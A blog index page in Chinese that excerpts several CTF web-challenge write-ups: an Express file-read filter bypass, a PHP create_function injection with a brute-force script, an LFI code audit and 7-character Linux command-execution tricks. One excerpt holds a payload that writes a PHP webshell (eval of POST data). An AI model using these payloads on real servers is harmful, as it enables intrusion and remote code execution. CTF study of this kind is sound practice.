jmx0hxq's blog

有点菜,做了2个签到web,22mu师傅做了一个re和一个misc webexpress fs?file=main.js读main.js123456789101112const express = require("express");const fs = require("fs"); const app = express(); const PORT = process.env.PORT || 80; app.use('/static', express.static('static')) app.use((req, res, next) => { if ([req.body, req.headers, req.query].some((item) => item && JSON.stringify(item).includes("flag"))) { return res.send("臭黑客!"); & ...

what’s my name源码忘存了,就记得几个绕过 正则直接include%0a绕过 create_function直接搜文章%27%22]);}phpinfo();/*绕过 这里强比较可以本地调试,发现是字符串类型,直接传参就行,注意lambda前面有个不可见字符我们用%00表示 这里的lambda每次都会加1,这是php的特性,只有php重启才会重新变回1,我一开始是构造好payload手点73下发现无法写马成功,可能环境问题,后来还是写脚本爆了123456789101112import requestsfrom concurrent.futures import ThreadPoolExecutorurl = 'http://47.108.206.43:43036/?d0g3=include%0a%27%22]);}file_put_contents("zoe.php","<?php+eval(\$_POST[1]);?>");/*&name=%00lambda_73'whi ...

源代码位置: https://github.com/stypr/my-ctf-challenges/blob/master/2019_XCTF_Finals/lfi2019/index.php 根据代码审计:$_SERVER["QUERY_STRING"]是查询的字符串,比如http://www.xxx.com/?p=222的值为p=222那我们在题目传参:?show-me-the-hint即可获取源码 我们观察代码的215行会发现: 这里根据我们的传参来分别执行不同的上传文件和访问文件操作Get类:123456789101112131415161718192021222324252627282930313233343536373839class Get { protected function nanahira(){ // senpai notice me // function exploit($data){ $exploit = new Sys ...

前置知识几个Linux命令需要了解一下: 可以写文件,比如>test就新建一个test名字的文件 ls -t可以把文件按照创建时间来排序 dir可以执行ls命令并且不换行输出 *:可以把ls列出来的第一个文件名当成命令,剩下的文件名当作参数,==相当于`ls`== 1234567>id>root>*uid=0(root) gid=0(root) groups=0(root)还可以通过在*左右添加字母来选择命令 rev倒置 123>revecho 1234 > v*v 这里*v指定了参数 7字符RCE12345678910111213<?php error_reporting(E_ALL); $sandbox = '/var/www/html/sandbox/'.md5("orange".$_SERVER['REMOTE_ADDR']); mkdir($sandbox); chdir($sandbox); if (isset($_GET[ ...